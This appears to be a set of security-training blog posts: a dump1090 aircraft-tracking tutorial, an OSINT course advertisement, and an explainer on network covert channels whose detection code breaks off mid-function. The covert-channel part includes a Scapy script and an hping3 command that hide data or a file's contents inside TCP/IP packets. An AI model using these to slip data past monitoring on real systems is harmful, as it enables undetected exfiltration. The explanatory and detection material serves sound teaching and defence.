
Unlocking the Skies: A Layman’s Guide to Aircraft Tracking with Dump1090

Dive into the fascinating world of aircraft tracking with our comprehensive guide on Dump1090. Whether you're an aviation enthusiast, a professional in the field, or simply curious about the technology that powers real-time aircraft monitoring, this article has something for everyone. Starting with a layman-friendly introduction to the invisible network of communication between aircraft and radar systems, we gradually transition into the more technical aspects of Dump1090, Software Defined Radio (SDR), and the significance of the 1090 MHz frequency. Learn how Dump1090 transforms raw Mode S data into accessible information, providing a window into the complex ballet of aircraft as they navigate the skies. Plus, discover the practical uses of this powerful tool, from tracking flights in real-time to conducting in-depth air traffic analysis. Join us as we unlock the secrets of the skies, making the invisible world of aviation radar data comprehensible and engaging for all.

In an age where the sky above us is crisscrossed by countless aircraft, each completing its journey from one corner of the world to another, there lies an invisible network of communication. This network, primarily composed of signals invisible to the naked eye, plays a critical role in ensuring the safety and efficiency of air travel. At the heart of this network is something known as Mode S, a sophisticated radar system used by aviation authorities worldwide to keep track of aircraft in real-time. But what if this complex data could be translated into something more accessible, something that could be understood by anyone from aviation enthusiasts to professionals in the field? Enter dump1090, a simple yet powerful command-line utility designed to demystify the world of aviation radar.

Imagine having the ability to see the invisible, to decode the silent conversations between aircraft and radar systems. With dump1090, this isn’t just a possibility—it’s a reality. By transforming raw Mode S data into a user-friendly format, dump1090 offers a window into the intricate ballet of aircraft as they navigate the skies. Whether you’re a pilot monitoring nearby traffic, an aviation enthusiast tracking flights from your backyard, or a professional analyzing air traffic patterns, dump1090 serves as your personal radar display, translating complex signals into clear, understandable information.

From displaying real-time data about nearby aircraft to generating detailed reports on air traffic patterns, dump1090 is more than just a tool—it’s a bridge connecting us to the otherwise invisible world of air travel. Its applications range from casual observation for hobbyists to critical data analysis for industry experts, making it a versatile companion for anyone fascinated by the dynamics of flight.

As we prepare to delve deeper into the technicalities of how dump1090 operates and the myriad ways it can be employed, let us appreciate the technology’s power to unlock the secrets of the skies. By decoding and displaying aviation radar data, dump1090 not only enhances our understanding of air travel but also brings the complex choreography of aircraft movements into sharper focus.

Transitioning to the Technical Section

Now that we’ve explored the fascinating world dump1090 opens up to us, let’s transition into the technical mechanics of how this utility works. From installation nuances to command-line flags and parameters that unleash its full potential, the following section will guide enthusiasts and professionals alike through the nuts and bolts of leveraging dump1090 to its maximum capacity. Whether your interest lies in enhancing personal knowledge or applying this tool in a professional aviation environment, understanding the technical underpinnings of dump1090 will empower you to tap into the rich stream of data flowing through the airwaves around us.

What is Dump1090?

Dump1090 or dump1090-mutability is a sophisticated, command-line-based software program specifically designed for Software Defined Radio (SDR) receivers that capture aircraft signal data. Operating primarily on the 1090 MHz frequency band, which is reserved for aviation use, dump1090 decodes the radio signals transmitted by aircraft transponders. These signals, part of the Mode S specification, contain a wealth of information about each plane in the vicinity, including its identity, position, altitude, and velocity.

Understanding Software Defined Radio (SDR)

At the core of dump1090’s functionality is the concept of Software Defined Radio (SDR). Unlike traditional radios, which use hardware components (such as mixers, filters, amplifiers, modulators/demodulators) to receive and transmit signals, SDR accomplishes these tasks through software. An SDR device allows users to receive a wide range of frequencies, including those used by aircraft transponders, by performing signal processing in software. This flexibility makes SDR an ideal platform for applications like dump1090, where capturing and decoding specific radio signals is required.

dump1090-mutability receives and decodes Mode S packets using the Realtek RTL2832 software-defined radio interface

The Significance of 1090 MHz

The 1090 MHz frequency is internationally allocated for aeronautical secondary surveillance radar transponder signals, specifically for the Mode S and Automatic Dependent Surveillance-Broadcast (ADS-B) technologies. Mode S (Selective) transponders provide air traffic controllers with a unique identification code for each aircraft, along with altitude information, while ADS-B extends this by broadcasting precise GPS-based position data. Dump1090 primarily listens to this frequency to capture the ADS-B transmissions that are openly broadcast by most modern aircraft.

Captured Information by Dump1090

Utilizing an SDR device tuned to 1090 MHz, dump1090 can capture and decode a variety of information broadcast by aircraft, including:

    • ICAO Aircraft Address: A unique 24-bit identifier assigned to each aircraft, used for identification in all ADS-B messages.
    • Flight Number: The flight identifier or call sign used for ATC communication.
    • Position (Latitude and Longitude): The geographic location of the aircraft, derived from its onboard GPS.
    • Altitude: The current flying altitude of the aircraft, usually in feet above mean sea level.
    • Velocity: The speed and direction of the aircraft’s motion.
    • Vertical Rate: The rate at which an aircraft is climbing or descending, typically in feet per minute.
    • Squawk Code: A four-digit code set by the pilot to communicate with air traffic control about the aircraft’s current status or mission.

Practical Use Cases

The real-time data captured by dump1090 is invaluable for a variety of practical applications:

    • Aviation Enthusiasts: Track flights and observe air traffic patterns in real-time.
    • Pilots and Air Traffic Controllers: Gain additional situational awareness of nearby aircraft.
    • Security and Surveillance: Monitor airspace for unauthorized or suspicious aircraft activity.
    • Research and Analysis: Collect data for studies on air traffic flows, congestion, and optimization of flight paths.

By combining dump1090 with an SDR device, users can access a live feed of the skies above them, turning a simple computer setup into a powerful aviation tracking station. This blend of technology offers a unique window into the otherwise invisible world of aerial communication, showcasing the power of modern radio and decoding technologies to unlock the secrets held in the 1090 MHz airwaves.

Let the Fun Begin

To dive into practical applications and understand how to use dump1090 to decode and display aircraft data from Mode S transponders, we’ll explore some common syntax used to run dump1090 and discuss the type of output you can expect. Let’s break down the steps to set up your environment for capturing live ADS-B transmissions and interpreting the data.

Basic Usage:

To start dump1090 and display aircraft data in your terminal, you can use:

dump1090 --interactive

This command runs dump1090 in interactive mode, which is designed for terminal use and provides a real-time text display of detected aircraft and their information.

Common Syntax

Now let’s walk through the basics of how to use this ADS-B receiver and decoder.

    • Quiet Mode:
dump1090 --quiet

This command runs dump1090 without printing detailed message output, reducing terminal clutter.

    • Enable Network Mode:
dump1090 --net

This enables the built-in web server and network services, allowing you to view aircraft data in a web browser at http://localhost:8080.

    • Raw Output Mode:
dump1090 --raw

Useful for debugging or processing raw Mode S messages with external tools.

    • Specify the SDR Device:

If you have multiple SDR devices connected:

dump1090 --device-index 0

This specifies which SDR device to use by index.

Expected Output

When running dump1090, especially in interactive mode, you can expect to see a continuously updating table that includes columns such as:

    • Hex: The aircraft’s ICAO address in hexadecimal.
    • Flight: The flight number or call sign.
    • Altitude: Current altitude in feet.
    • Speed: Ground speed in knots.
    • Lat/Lon: Latitude and longitude of the aircraft.
    • Track: The direction the aircraft is facing, in degrees.
    • Messages: The number of Mode S messages received from this aircraft.
    • Seen: Time since the last message was received from the aircraft.

Here’s a simplified example of what the output might look like:

Hex     Flight  Altitude  Speed  Lat      Lon       Track  Messages  Seen
A1B2C3  ABC123  33000     400    40.1234  -74.1234  180    200       1 sec
D4E5F6  DEF456  28000     380    41.5678  -75.5678  135    150       2 sec

This display provides a real-time overview of aircraft in the vicinity of your SDR receiver, including their positions, altitudes, and flight numbers.

Using multiple Software Defined Radios (SDRs) in conjunction with dump1090 can significantly enhance the tracking and monitoring capabilities of aircraft by employing a technique known as multilateration (MLAT). Multilateration allows for the accurate triangulation of an aircraft’s position by measuring the time difference of arrival (TDOA) of a signal to multiple receiver stations. This method is particularly useful for tracking aircraft that do not broadcast their GPS location via ADS-B or for augmenting the precision of location data in areas with dense aircraft traffic.

Enhancing Your Radar: Advanced Techniques with Dump1090

Beyond the basics of using Dump1090 to monitor air traffic through Mode S signals, some advanced features and techniques can further expand your radar capabilities. From improving message decoding to leveraging network support for broader data analysis, Dump1090 offers a range of functionalities designed for aviation enthusiasts and professionals alike. Here, we’ll explore these advanced options, providing syntax examples and insights into how they can enhance your aircraft tracking endeavors.

Advanced Decoding and Network Features

Robust Decoding of Weak Messages: Dump1090 is known for its ability to decode weak messages more effectively than other decoders. This enhanced sensitivity can extend the range of your SDR, allowing you to detect aircraft that are further away or those with weaker transponder signals.

Network Support for Expanded Data Analysis: With built-in network capabilities, Dump1090 can stream decoded messages over TCP, provide raw packet data, and even host an embedded HTTP server. This allows for real-time display of detected aircraft on Google Maps, offering a visual representation of air traffic in your vicinity.

    • TCP Stream: For real-time message streaming, use the --net flag:

      ./dump1090 --net

      Connect to http://localhost:8080 to access the embedded web server and view aircraft positions on a map.

    • Single Bit Error Correction: Utilizing the 24-bit CRC, Dump1090 can correct single-bit errors, enhancing the reliability of the decoded messages. This feature is automatically enabled but can be disabled for pure data analysis purposes using the --no-fix option.

    • Decoding Diverse DF Formats: Dump1090 can decode a variety of Downlink Formats (DF), including DF0, DF4, DF5, DF16, DF20, and DF21, by brute-forcing the checksum field with recently seen ICAO addresses. This broadens the scope of data captured, offering more comprehensive insights into aircraft movements.
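
The two bullets above describe checksum work that is easiest to follow with numbers in hand. The following Python is an added example written for this page, not code from dump1090: it implements the Mode S CRC-24 polynomial, generates a frame's parity field, brute-forces a single-bit correction, and recovers an ICAO address from a frame whose parity has the address overlaid, which is what the "recently seen addresses" check relies on. The DF17 identification frame 8D4840D6202CC371C32CE0576098 is a widely published ADS-B sample; the DF4 payload 200005B0 and the recently-seen set are constructed for the demonstration.

```python
"""Mode S CRC-24 parity, single-bit correction and ICAO recovery (added example).

Frames are hex strings of 56 bits (short formats such as DF4/DF5) or 112 bits
(long formats such as DF17/DF20/DF21).
"""

GENERATOR = 0x1FFF409  # Mode S polynomial: x^24 + x^23 + ... + x^12 + x^10 + x^3 + 1

# 6-bit character set used by ADS-B identification messages (type codes 1-4).
CALLSIGN_CHARS = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"


def remainder(frame_hex: str) -> int:
    """CRC remainder over the whole frame, parity bits included.

    For DF17/DF18 a correct frame gives 0. For DF0/4/5/16/20/21 the transmitter
    XORs its ICAO address into the parity field (the AP field), so the remainder
    of a correct frame is the address itself, which is what a decoder compares
    against addresses it has recently seen in CRC-protected frames.
    """
    data = int(frame_hex, 16)
    nbits = len(frame_hex) * 4
    for i in range(nbits - 1, 23, -1):  # long division, MSB first, stop at the parity field
        if (data >> i) & 1:
            data ^= GENERATOR << (i - 24)
    return data & 0xFFFFFF


def build_frame(payload_hex: str, ap_xor: int = 0) -> str:
    """Append the 24-bit parity to a payload; ap_xor overlays an ICAO address (AP field)."""
    parity = remainder(payload_hex + "000000")
    return payload_hex + f"{parity ^ ap_xor:06X}"


def correct_single_bit(frame_hex: str):
    """Return (corrected_frame, flipped_bit_index_from_msb) or (None, None).

    A frame whose remainder is already 0 is returned unchanged with index None.
    Brute-forcing all bit positions is cheap for a 112-bit frame.
    """
    if remainder(frame_hex) == 0:
        return frame_hex, None
    nbits = len(frame_hex) * 4
    data = int(frame_hex, 16)
    for bit in range(nbits):
        candidate = f"{data ^ (1 << bit):0{len(frame_hex)}X}"
        if remainder(candidate) == 0:
            return candidate, nbits - 1 - bit
    return None, None


def recover_icao(frame_hex: str, recently_seen: set):
    """ICAO recovery for address-overlaid formats: accept the remainder only if it
    is an address already seen in a frame whose CRC could be verified outright."""
    candidate = remainder(frame_hex)
    return candidate if candidate in recently_seen else None


def callsign(frame_hex: str):
    """Decode the 8-character callsign of a DF17 identification message (type codes 1-4)."""
    me = int(frame_hex[8:22], 16)  # ME field: message bits 33-88
    type_code = me >> 51
    if not 1 <= type_code <= 4:
        return None
    return "".join(CALLSIGN_CHARS[(me >> (42 - 6 * i)) & 0x3F] for i in range(8))


if __name__ == "__main__":
    real = "8D4840D6202CC371C32CE0576098"  # published DF17 sample (ICAO 4840D6)
    print("DF17 remainder (0 = parity OK):", remainder(real))
    print("callsign:", callsign(real))
    damaged = f"{int(real, 16) ^ (1 << 60):028X}"   # constructed single-bit error
    print("corrected:", correct_single_bit(damaged))
    df4 = build_frame("200005B0", ap_xor=0x4840D6)     # constructed DF4 with AP overlay
    print("DF4 ICAO recovered:", hex(recover_icao(df4, {0x4840D6}) or 0))
```

The recovery step is the weak point a practitioner should keep in mind: a DF4/DF5 frame carries no independent check, so a corrupted frame whose remainder happens to equal a recently seen address will be accepted, and decoders limit the damage by requiring the address to have been seen recently rather than merely to be any plausible value.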

Syntax for Advanced Usage

Using Files as a Data Source: For situations where live SDR data is unavailable, Dump1090 can decode data from prerecorded binary files:

./dump1090 --ifile /path/to/your/file.bin

Generate compatible binary files using rtl_sdr:

rtl_sdr -f 1090000000 -s 2000000 -g 50 - | gzip > yourfile.bin.gz

dump1090 reads the raw 8-bit I/Q samples directly and does not decompress gzip, so uncompress the capture (for example with gunzip) before passing it to --ifile.

Interactive Mode with Networking:
To engage interactive mode with networking, enabling access to the web interface:

./dump1090 --interactive --net

Aggressive Mode for Enhanced Detection:
Activate aggressive mode with --aggressive to employ more CPU-intensive methods for detecting additional messages:

./dump1090 --aggressive

This mode is beneficial in low-traffic areas where capturing every possible message is paramount.

Network Server Capabilities
    • Port 30002 for Real-Time Data Streaming: Clients connected to this port receive data as it arrives, in a raw format suitable for further processing.

    • Port 30001 for Raw Input: This port accepts raw Mode S messages, allowing Dump1090 to function as a central hub for data collected from multiple sources.

      Combine data from remote Dump1090 instances:

      nc remote-dump1090.example.net 30002 | nc localhost 30001

    • Port 30003 for SBS1 Format: Ideal for feeding data into flight tracking networks, this port outputs messages in the BaseStation format.
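
Since the port 30003 output and the interactive table shown earlier carry the same information, here is an added Python example (not part of dump1090) that reads BaseStation (SBS1) lines, keeps per-aircraft state the way the interactive display does, and renders it in that shape. The sample feed is constructed, not captured; the field layout (22 comma-separated fields, with the hex ident in field 5, callsign in 11, altitude in 12, ground speed 13, track 14, latitude 15, longitude 16, vertical rate 17 and squawk 18) is the standard BaseStation layout. Because ports 30001 and 30003 can be fed by remote machines, the parser treats every line as untrusted and drops malformed records instead of failing on them.

```python
"""Parse BaseStation (SBS1) lines from a dump1090 port 30003 feed into a per-aircraft table (added example)."""

import re
from dataclasses import dataclass
from typing import Dict, List, Optional

HEX_IDENT = re.compile(r"^[0-9A-Fa-f]{6}$")
SBS_FIELD_COUNT = 22  # every SBS1 MSG line carries exactly 22 comma-separated fields


@dataclass
class Aircraft:
    hex: str
    flight: str = ""
    altitude: Optional[int] = None
    speed: Optional[int] = None
    track: Optional[int] = None
    lat: Optional[float] = None
    lon: Optional[float] = None
    vertical_rate: Optional[int] = None
    squawk: str = ""
    messages: int = 0
    last_seen: str = ""


def parse_sbs_line(line: str) -> Optional[list]:
    """Split one SBS1 line, rejecting anything that is not a well-formed MSG record.

    Remote feeders can write to these ports, so a wrong field count or a
    non-hex ident is dropped rather than trusted.
    """
    fields = line.rstrip("\r\n").split(",")
    if len(fields) != SBS_FIELD_COUNT or fields[0] != "MSG":
        return None
    if not HEX_IDENT.match(fields[4]):
        return None
    return fields


def _num(value: str, cast):
    """Convert a numeric field, returning None for blanks or garbage."""
    try:
        return cast(value) if value.strip() else None
    except ValueError:
        return None


def update_table(table: Dict[str, Aircraft], fields: list) -> None:
    """Merge one MSG record into the table, mirroring dump1090's interactive columns."""
    tx_type = fields[1]
    ac = table.setdefault(fields[4].upper(), Aircraft(hex=fields[4].upper()))
    ac.messages += 1
    ac.last_seen = fields[7]                              # time generated
    if tx_type == "1" and fields[10].strip():             # ES identification: callsign
        ac.flight = fields[10].strip()
    if tx_type in ("3", "5", "6", "7"):                   # records that carry altitude
        alt = _num(fields[11], int)
        if alt is not None:
            ac.altitude = alt
    if tx_type == "3":                                    # ES airborne position
        lat, lon = _num(fields[14], float), _num(fields[15], float)
        if lat is not None and lon is not None:
            ac.lat, ac.lon = lat, lon
    if tx_type == "4":                                    # ES airborne velocity
        ac.speed = _num(fields[12], int)
        ac.track = _num(fields[13], int)
        ac.vertical_rate = _num(fields[16], int)
    if tx_type == "6" and fields[17].strip():             # surveillance ID: squawk
        ac.squawk = fields[17].strip()


def build_table(lines: List[str]) -> Dict[str, Aircraft]:
    table: Dict[str, Aircraft] = {}
    for line in lines:
        fields = parse_sbs_line(line)
        if fields is not None:
            update_table(table, fields)
    return table


def _cell(value, width: int) -> str:
    return f"{'' if value is None else value:<{width}}"


def render(table: Dict[str, Aircraft]) -> str:
    """Text rendering in the shape of the dump1090 --interactive display."""
    rows = [_cell("Hex", 8) + _cell("Flight", 9) + _cell("Altitude", 9) + _cell("Speed", 7)
            + _cell("Lat", 10) + _cell("Lon", 11) + _cell("Track", 6) + _cell("Messages", 9) + "Seen"]
    for ac in sorted(table.values(), key=lambda a: a.hex):
        rows.append(_cell(ac.hex, 8) + _cell(ac.flight, 9) + _cell(ac.altitude, 9) + _cell(ac.speed, 7)
                    + _cell(ac.lat, 10) + _cell(ac.lon, 11) + _cell(ac.track, 6) + _cell(ac.messages, 9)
                    + ac.last_seen)
    return "\n".join(rows)


# Constructed sample feed (not captured traffic): two aircraft plus one malformed line.
SAMPLE_FEED = [
    "MSG,1,1,1,A1B2C3,1,2024/01/01,12:00:00.000,2024/01/01,12:00:00.000,ABC123  ,,,,,,,,,,,",
    "MSG,3,1,1,A1B2C3,1,2024/01/01,12:00:01.000,2024/01/01,12:00:01.000,,33000,,,40.1234,-74.1234,,,0,0,0,0",
    "MSG,4,1,1,A1B2C3,1,2024/01/01,12:00:02.000,2024/01/01,12:00:02.000,,,400,180,,,-640,,,,,",
    "MSG,6,1,1,A1B2C3,1,2024/01/01,12:00:03.000,2024/01/01,12:00:03.000,,,,,,,,3451,0,0,0,0",
    "MSG,5,1,1,D4E5F6,1,2024/01/01,12:00:04.000,2024/01/01,12:00:04.000,,28000,,,,,,,0,,0,0",
    "MSG,3,1,1,ZZZZZZ,1,2024/01/01,12:00:05.000,bad-line",  # rejected: non-hex ident, 9 fields
]

if __name__ == "__main__":
    print(render(build_table(SAMPLE_FEED)))
```

The second aircraft shows the case the earlier MLAT paragraph is about: a Mode S reply (MSG,5) gives altitude and an ident but no position, so its Lat/Lon columns stay empty until either an ADS-B position arrives or a multilateration result is fed in.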

Building Your Own Radar Network

By strategically deploying multiple SDRs equipped with Dump1090 and utilizing the software’s network capabilities, you can create a comprehensive radar network. This setup not only enhances coverage area but also improves the accuracy of aircraft positioning through techniques like multilateration.

How Multilateration Works

Multilateration for aircraft tracking works by utilizing the fact that radio signals travel at a constant speed (the speed of light). By measuring precisely when a signal from an aircraft’s transponder is received at multiple ground-based SDRs, and knowing the exact locations of those receivers, it’s possible to calculate the source of the signal — the aircraft’s position.

The process involves the following steps:

    • Signal Reception: Multiple ground stations equipped with SDRs receive a signal transmitted by an aircraft.
    • Time Difference Calculation: Each station records the exact time the signal was received. Because the signal's travel time varies with the distance to each receiver, the differences in reception time between the stations carry information about where the aircraft is.
    • Position Calculation: Using the time differences and the known locations of the receivers, the position of the aircraft is calculated through triangulation, determining where the signal originated from within three-dimensional space.

Setting Up Multiple SDRs for MLAT

To utilize MLAT, you’ll need several SDRs set up at different, known locations. Each SDR needs to be connected to a computer or a device capable of running dump1090 or similar software. The software should be configured to send the raw Mode S messages along with precise timestamps to a central server capable of performing the MLAT calculations.

Configuring Dump1090 for MLAT
    • Install and Run Dump1090: Ensure dump1090 is installed and running on each device connected to an SDR, as described in previous sections.
    • Synchronize Clocks: Precise timekeeping is crucial for MLAT. Ensure that the clocks on the devices running dump1090 are synchronized, typically using NTP (Network Time Protocol).
    • Central MLAT Server: You will need a central server that receives data from all your dump1090 instances. This server will perform the MLAT calculations. You can use existing MLAT server software packages, such as those provided by flight tracking networks like FlightAware, or set up your own if you have the technical expertise.
    • Configure Network Settings: Each instance of dump1090 must be configured to forward the received Mode S messages to your MLAT server. This is often done through command-line flags or configuration files specifying the server’s IP address and port.

MLAT Server Configuration

Configuring an MLAT server involves setting up the software to receive data from your receivers, perform the TDOA calculations, and optionally, output the results to a map or data feed. This setup requires detailed knowledge of network configurations and potentially custom software development, as the specifics can vary widely depending on the chosen solution.

Example Configuration

An example configuration for forwarding data from dump1090 to an MLAT server is not universally applicable due to the variety of software and network setups possible. However, most configurations will involve specifying the MLAT server’s address and port in the dump1090 or receiver software settings, often along with authentication details if required.

While setting up an MLAT system with multiple SDRs for aircraft tracking is more complex and requires additional infrastructure compared to using a single SDR for ADS-B tracking, the payoff is the ability to accurately track a wider range of aircraft, including those not broadcasting their position. Successfully implementing such a system can provide invaluable data for aviation enthusiasts, researchers, and professionals needing detailed situational awareness of the skies.

Tips for Successful Monitoring
    • Ensure your SDR antenna is properly positioned for optimal signal reception; higher locations with clear line-of-sight to the sky tend to work best.
    • Consider running dump1090 on a dedicated device like a Raspberry Pi to enable continuous monitoring.
    • Explore dump1090’s web interface for a graphical view of aircraft positions on a map, which provides a more intuitive way to visualize the data.

Through these commands and output expectations, users can effectively utilize dump1090 to monitor and analyze ADS-B transmissions, turning complex radar signals into accessible and actionable aviation insights.

The CSI Linux Certified OSINT Analyst (CSIL-COA)

Course: CSI Linux Certified OSINT Analyst | CSI Linux Academy

Embark on a thrilling journey into the heart of digital sleuthing with the CSI Linux Certified-OSINT Analyst (CSIL-COA) program. In today’s world, where the internet is the grand tapestry of human knowledge and secrets, the ability to sift through this vast digital expanse is crucial for uncovering the truth. Whether it’s a faint digital whisper or a conspicuous online anomaly, every clue has a story to tell, often before traditional evidence comes to light. The CSIL-COA is your gateway to mastering the art and science of open-source intelligence, transforming scattered online breadcrumbs into a roadmap of actionable insights.

With the CSIL-COA certification, you’re not just learning to navigate the digital realm; you’re mastering it. This course is a deep dive into the core of online investigations, blending time-honored investigative techniques with the prowess of modern Open-Source Intelligence (OSINT) methodologies. From the initial steps of gathering information to the preservation of digital footprints and leveraging artificial intelligence to unravel complex data puzzles, this program covers it all. By the end of this transformative journey, you’ll emerge as a skilled digital detective, equipped with the knowledge and tools to lead your investigations with accuracy and innovation. Step into the role of an OSINT expert with us and expand your investigative landscape.

Here’s a glimpse of what awaits you in each segment of the OSINT certification and training material:

Who is CSIL-COA For?
    • Law Enforcement
    • Intelligence Personnel
    • Private Investigators
    • Insurance Investigators
    • Cyber Incident Responders
    • Digital Forensics (DFIR) analysts
    • Penetration Testers
    • Social Engineers
    • Recruiters
    • Human Resources Personnel
    • Researchers
    • Investigative Journalists

CSIL-COA Course Outline
    • What is OSINT?
    • Unraveling the Intricacies of Digital Forensics
    • Preserving Online Evidence
    • Phone Numbers and Info
    • IP Addresses, Proxies, and VPNs
    • DNS, Domains, and Subdomains
    • Importance of Anonymity
    • Examples of Online Investigation
    • Misinformation, Disinformation, and Deception

    • Crafting Your Digital Disguise: The Art of Persona (Sock Puppet) Creation
    • Using your persona to investigate
    • Translation options
    • Website Collection
    • 3rd Party Commercial Apps
    • OSINT Frameworks (tools)
    • Tracking changes and getting alerts
    • Public Records Searches
    • Geolocation
    • Tracking Transportation

    • The Storytelling Power of Images
    • Social Media Sites
    • Video Evidence Collection
    • Cryptocurrency
    • AI Challenges
    • Reporting and Actionable Intelligence
    • OSINT Case Studies
    • Practicing OSINT and Resources
    • Course Completion
    • The CSIL-COA Exam

The CSIL-COA Exam Details
Exam Format:
    • Online testing
    • 85 questions (Multiple Choice)
    • 2 hours
    • A minimum passing score of 85%
    • Cost: $385

Domain Weight
    • OPSEC (13%)
    • Technology and Online Basics (20%)
    • Laws, Ethics, and Investigations (9%)
    • Identification (16%)
    • Collection & Preservation (13%)
    • Examination & Analysis (13%)
    • Presentation & Reporting (14%)

Certification Validity and Retest

The certification is valid for three years. To receive a free retest voucher within this period, you must either:

    • Submit a paper related to the subject you were certified in, ensuring it aligns with the course material.
    • Provide a walkthrough of a tool not addressed in the original course that can be a valuable supplement to the content.

This fosters continuous learning and allows for enriching the community and the field. Doing this underscores your commitment to staying updated in the industry. If you don’t adhere to these requirements and fail to recertify within the 3-year timeframe, your certification will expire.

Shadows and Signals: Unveiling the Hidden World of Covert Channels in Cybersecurity

A covert channel is a type of communication method which allows for the transfer of data by exploiting resources that are commonly available on a computer system. Covert channels are types of communication that are invisible to the eyes of the system administrators or other authorized users. Covert channels are within a computer or network system, but are not legitimate or sanctioned forms of communication. They may be used to transfer data in a clandestine fashion.

One term that often pops up in the realm of digital sleuthing is “covert channels.” Imagine for a moment, two secret agents communicating in a room full of people, yet no one else is aware of their silent conversation. This is akin to what happens in the digital world with covert channels – secretive pathways that allow data to move stealthily across a computer system, undetected by those who might be monitoring for usual signs of data transfer.

Covert channels are akin to hidden passageways within a computer or network, not intended or recognized for communication by the system’s overseers. These channels take advantage of normal system functions in creative ways to sneak data from one place to another without raising alarms. For example, data might be cleverly embedded within the mundane headers of network packets, a practice akin to hiding a secret note in the margin of a public document. Or imagine a scenario where a spy hides their messages within the normal communications of a legitimate app, sending out secrets alongside everyday data.

Other times, covert channels can be more about timing than hiding data in plain sight. By altering the timing of certain actions or transmissions, secret messages can be encoded in what seems like normal system behavior. There are also more direct methods, like covert storage channels, where data is tucked away in the nooks and crannies of a computer’s memory or disk space, hidden from prying eyes.

Then there’s the art of data diddling – tweaking data ever so slightly to carry a hidden message or malicious code. And let’s not forget steganography, the age-old practice of hiding messages within images, audio files, or any other type of media, updated for the digital age.

While the term “covert channels” might conjure images of cyber villains and underhanded tactics, it’s worth noting that these secretive pathways aren’t solely the domain of wrongdoers. They can also be harnessed for good, offering a way to secure communications by encrypting them in such a way that they blend into the digital background noise.

Examples of covert channels include:
    • Embedding data in the headers of packets – The covert data is embedded in the headers of normal packets and sent over a protocol related to the normal activities of the computer system in question.
    • Data piggybacked on applications – Malicious applications are piggybacked with legitimate applications used on the computer system, sending confidential data.
    • Time-based channel – The timing of certain actions or transmissions is used to encode data.
    • Covert storage channel – Data is stored within a computer system on disk or in memory and is hidden from the system’s administrators.
    • Data diddling – This involves manipulating data to contain malicious code or messages.
    • Steganography – This is a process of hiding messages within other types of media such as images and audio files.

Covert channels are commonly used for malicious purposes, such as the transmission of sensitive data or the execution of malicious code on a computer system. They can also be used for legitimate purposes, however, such as creating an encrypted communication channel.

Let’s talk a little more about how this is done with a few of the methods…

Embedding data in the headers of packets

Embedding data in the headers of network packets represents a sophisticated method for establishing covert channels in a networked environment. This technique leverages the unused or reserved bits in protocol headers, such as TCP, IP, or even DNS, to discreetly transmit data. These channels can be incredibly stealthy, making them challenging to detect without deep packet inspection or anomaly detection systems in place. Here’s a detailed look into how it’s accomplished and the tools that can facilitate such actions.

Technical Overview

Protocol headers are structured with predefined fields, some of which are often unused or set aside for future use (reserved bits). By embedding information within these fields, it’s possible to bypass standard monitoring tools that typically inspect packet payloads rather than header values.

IP Header Manipulation

An IP header, for instance, has several fields where data could be covertly inserted, such as the Identification field, Flags, Fragment Offset, or even the TOS (Type of Service) fields.

Example using Scapy in Python:

from scapy.all import IP, TCP, send

# Define the destination IP address and the port number
dest_ip = "192.168.1.1"
dest_port = 80

# Craft the packet with covert data in the 16-bit IP Identification field
packet = IP(dst=dest_ip, id=1337)/TCP(dport=dest_port)/"Covert message here"

# Send the packet (raw-socket access is required)
send(packet)

In this example, 1337 is the covert data embedded in the id field of the IP header. The packet is then sent to the destination IP and port specified. This is a simplistic representation, and in practice, the covert data would likely be more subtly encoded.

TCP Header Manipulation

Similarly, the TCP header has fields like the Sequence Number or Acknowledgment Number that can be exploited to carry hidden information.

Example using Hping3 (a command-line packet crafting tool):

hping3 -S 192.168.1.1 -p 80 --tcp-timestamp -d 120 -E file_with_covert_data.txt -c 1


This command sends a SYN packet to 192.168.1.1 on port 80, embedding the content of file_with_covert_data.txt within the packet. The -d 120 specifies the size of the packet, and -c 1 indicates that only one packet should be sent. Hping3 allows for the customization of various TCP/IP headers, making it suitable for covert channel exploitation.

Tools and Syntax for Covert Communication
    • Scapy: A powerful Python-based tool for packet crafting and manipulation.
      • The syntax for embedding data into an IP header has been illustrated above with Scapy.
    • Hping3: A command-line network tool that can send custom TCP/IP packets.
      • The example provided demonstrates embedding data into a packet using Hping3.
Detection and Mitigation

Detecting such covert channels involves analyzing packet headers for anomalies or inconsistencies with expected protocol behavior. Intrusion Detection Systems (IDS) and Deep Packet Inspection (DPI) tools can be configured to flag unusual patterns in these header fields.
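
As one concrete form of the header analysis described above, the following added Python example (written for this page, not taken from any IDS product) scores each (source, destination) flow on whether its IP Identification values look like a normal counter or like pairs of printable characters, which is the kind of value the Scapy example earlier places in the id field. The packet tuples are constructed; the thresholds are illustrative starting points, not a published standard.

```python
"""Flag IP Identification sequences that look like smuggled text rather than a counter (added example).

Works on (src, dst, ip_id) tuples such as an analyst would export from a capture.
The thresholds are illustrative, not a standard.
"""

from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Flow = Tuple[str, str]

MIN_PACKETS = 8            # judge a flow only once it has enough samples
PRINTABLE_THRESHOLD = 0.5  # random 16-bit IDs have both bytes printable only ~14% of the time


def both_bytes_printable(ip_id: int) -> bool:
    """True when the 16-bit ID splits into two printable ASCII bytes."""
    hi, lo = ip_id >> 8, ip_id & 0xFF
    return all(0x20 <= b <= 0x7E for b in (hi, lo))


def is_sequential(ids: List[int]) -> bool:
    """Counter-based stacks produce small positive steps (mod 2^16)."""
    steps = [(b - a) % 65536 for a, b in zip(ids, ids[1:])]
    return bool(steps) and all(0 < s <= 16 for s in steps)


def analyse_flows(packets: Iterable[Tuple[str, str, int]]) -> Dict[Flow, dict]:
    """Group packets per (src, dst) and score the IP ID sequence of each flow.

    A flow is suspicious when most IDs decode to printable pairs AND they do not
    advance like a counter. The counter check matters: a counter that happens to
    sit in the printable range (as the constructed normal flow below does) would
    otherwise be a false positive. Stacks that send ID 0 for atomic datagrams
    (allowed by RFC 6864) are excluded via the zero-ratio check.
    """
    per_flow: Dict[Flow, List[int]] = defaultdict(list)
    for src, dst, ip_id in packets:
        per_flow[(src, dst)].append(ip_id)
    report: Dict[Flow, dict] = {}
    for flow, ids in per_flow.items():
        if len(ids) < MIN_PACKETS:
            continue
        printable = sum(both_bytes_printable(i) for i in ids) / len(ids)
        zero_ratio = ids.count(0) / len(ids)
        sequential = is_sequential(ids)
        suspicious = printable >= PRINTABLE_THRESHOLD and not sequential and zero_ratio < 0.5
        report[flow] = {"packets": len(ids), "printable_ratio": round(printable, 2),
                        "sequential": sequential, "suspicious": suspicious}
    return report


def decode_ids_as_text(ids: List[int]) -> str:
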